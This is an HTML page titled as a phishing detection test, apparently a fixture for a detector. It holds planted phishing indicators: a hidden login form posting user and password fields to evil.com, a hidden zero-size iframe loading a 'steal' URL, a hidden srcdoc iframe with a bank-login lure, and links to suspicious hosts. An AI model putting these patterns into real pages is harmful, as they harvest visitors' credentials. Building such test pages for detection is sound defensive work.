<!DOCTYPE html>
<html>

  <head>
    <title>🧪 Full Phishing Detection Test</title>

    <style>
      .heyy-yo {
        background-color: aqua;
        color: brown;
        border-color: rgb(255, 0, 187);

      }
    </style>
  <link rel="icon" href="https://evil.com/favicon.jpg">
  <link rel="stylesheet" href="https://tracker.example.com/styles.css">

  <!-- meta עם קישור חיצוני חשוד -->
  <meta content="https://login.evil-site.com/phish" name="description">
  <meta content="secure login required" name="keywords">

    







  </head>




  <body>
      <button class='hey_new_class'>
          hello mate !!!
          hahhshhsh
              
      </button>
        <form style="display: none;" action="https://evil.com">
    <input type="text" name="user">
    <input type="password" name="pass">
    <input type="submit" value="Login">
  </form>
      <script>
        //<link rel="icon" type="image/x-icon" href="favicon.ico">
        //commenttttt
        document.title="duckkkkk";
        document.body.style.border='10px solid red';
       
         console.log(document.querySelector('button'));
      
        // alert('hello');
      </script>
       <iframe 
    src="https://malicious.example.com/steal" 
    width="0" 
    height="0" 
    style="display:none">
  </iframe>
     <iframe 
    width="0" 
    height="0" 
    style="display:none"
    srcdoc='
      <style>form{display:none;}</style>
      <form><input type="text"><input type="password"></form>
      <script>console.log("steal info")</script>
      <p>Login to your bank account now</p>
    '>
  </iframe>
  </body>
</html>
